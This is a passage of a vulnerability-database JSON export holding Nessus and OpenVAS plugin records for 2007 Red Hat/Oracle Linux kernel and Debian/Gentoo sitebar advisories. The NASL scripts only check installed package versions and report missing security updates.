"2019-01-16T20:07:51", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix various security issues in the Red\nHat Enterprise Linux 5 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\npackages, which contain backported patches to resolve these issues.\n\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil\nKettle for reporting the security issues corrected by this update.", "modified": "2018-11-16T00:00:00", "published": "2007-11-30T00:00:00", "id": "REDHAT-RHSA-2007-0993.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=28363", "title": "RHEL 5 : kernel (RHSA-2007:0993)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0993. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(28363);\n script_version (\"1.20\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(25807, 26337);\n script_xref(name:\"RHSA\", value:\"2007:0993\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2007:0993)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix various security issues in the Red\nHat Enterprise Linux 5 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\npackages, which contain backported patches to resolve these issues.\n\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil\nKettle for reporting the security issues corrected by this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-5494\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0993\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0993\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-53.1.4.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-53.1.4.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:16:26", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2007:0993 :\n\nUpdated kernel packages that fix various security issues in the Red\nHat Enterprise Linux 5 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\npackages, which contain backported patches to resolve these issues.\n\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil\nKettle for reporting the security issues corrected by this update.", "modified": "2018-07-18T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2007-0993.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67595", "title": "Oracle Linux 5 : kernel (ELSA-2007-0993)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0993 and \n# Oracle Linux Security Advisory ELSA-2007-0993 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67595);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2007-4571\", \"CVE-2007-4997\", \"CVE-2007-5494\");\n script_bugtraq_id(25807, 26337);\n script_xref(name:\"RHSA\", value:\"2007:0993\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2007-0993)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0993 :\n\nUpdated kernel packages that fix various security issues in the Red\nHat Enterprise Linux 5 kernel are now available.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nThese new kernel packages contain fixes for the following security\nissues :\n\nA memory leak was found in the Red Hat Content Accelerator kernel\npatch. A local user could use this flaw to cause a denial of service\n(memory exhaustion). (CVE-2007-5494, Important)\n\nA flaw was found in the handling of IEEE 802.11 frames affecting\nseveral wireless LAN modules. In certain circumstances, a remote\nattacker could trigger this flaw by sending a malicious packet over a\nwireless network and cause a denial of service (kernel crash).\n(CVE-2007-4997, Important).\n\nA flaw was found in the Advanced Linux Sound Architecture (ALSA). A\nlocal user who had the ability to read the /proc/driver/snd-page-alloc\nfile could see portions of kernel memory. (CVE-2007-4571, Moderate).\n\nIn addition to the security issues described above, several bug fixes\npreventing possible memory corruption, system crashes, SCSI I/O fails,\nnetworking drivers performance regression and journaling block device\nlayer issue were also included.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\npackages, which contain backported patches to resolve these issues.\n\nRed Hat would like to credit Vasily Averin, Chris Evans, and Neil\nKettle for reporting the security issues corrected by this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-November/000419.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-53.1.4.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-53.1.4.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:49", "bulletinFamily": "scanner", "description": "The remote host is missing an update to sitebar\nannounced via advisory DSA 1423-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=59958", "id": "OPENVAS:59958", "title": "Debian Security Advisory DSA 1423-1 (sitebar)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1423_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1423-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in sitebar, a\nweb based bookmark manager written in PHP. The Common Vulnerabilities\nExposures project identifies the following problems:\n\nCVE-2007-5491\nA directory traversal vulnerability in the translation module allows\nremote authenticated users to chmod arbitrary files to 0777 via ..\nsequences in the lang parameter.\n\nCVE-2007-5492\nA static code injection vulnerability in the translation module allows\na remote authenticated user to execute arbitrary PHP code via the value\nparameter.\n\nCVE-2007-5693\nAn eval injection vulnerability in the translation module allows\nremote authenticated users to execute arbitrary PHP code via the\nedit parameter in an upd cmd action.\n\nCVE-2007-5694\nA path traversal vulnerability in the translation module allows\nremote authenticated users to read arbitrary files via an absolute\npath in the 'dir' parameter.\n\nCVE-2007-5695\nAn error in command.php allows remote attackers to redirect users\nto arbitrary web sites via the forward parameter in a Log In action.\n\nCVE-2007-5692\nMultiple cross site scripting flaws allow remote attackers to inject\narbitrary script or HTML fragments into several scripts.\n\n\nFor the stable distribution (etch), these problem have been fixed in version\n3.3.8-7etch1.\n\nFor the old stable distribution (sarge), these problems have been fixed in\nversion 3.2.6-7.1sarge1\n\nFor the unstable distribution (sid), these problems have been fixed in version\n3.3.8-12.1.\n\nWe recommend that you upgrade your sitebar package.\";\ntag_summary = \"The remote host is missing an update to sitebar\nannounced via advisory DSA 1423-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201423-1\";\n\nif(description)\n{\n script_id(59958);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:23:47 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-5491\", \"CVE-2007-5492\", \"CVE-2007-5693\", \"CVE-2007-5694\", \"CVE-2007-5695\", \"CVE-2007-5692\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1423-1 (sitebar)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"sitebar\", ver:\"3.2.6-7.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sitebar\", ver:\"3.3.8-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200711-05.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58744", "id": "OPENVAS:58744", "title": "Gentoo Security Advisory GLSA 200711-05 (sitebar)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple issues have been identified in SiteBar that might allow execution\nof arbitrary code and arbitrary file disclosure.\";\ntag_solution = \"All SiteBar users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/sitebar-3.3.9'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200711-05\nhttp://bugs.gentoo.org/show_bug.cgi?id=195810\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200711-05.\";\n\n \n\nif(description)\n{\n script_id(58744);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-5491\", \"CVE-2007-5492\", \"CVE-2007-5692\", \"CVE-2007-5693\", \"CVE-2007-5694\", \"CVE-2007-5695\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200711-05 (sitebar)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-apps/sitebar\", unaffected: make_list(\"ge 3.3.9\"), vulnerable: make_list(\"lt 3.3.9\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:43", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "href": 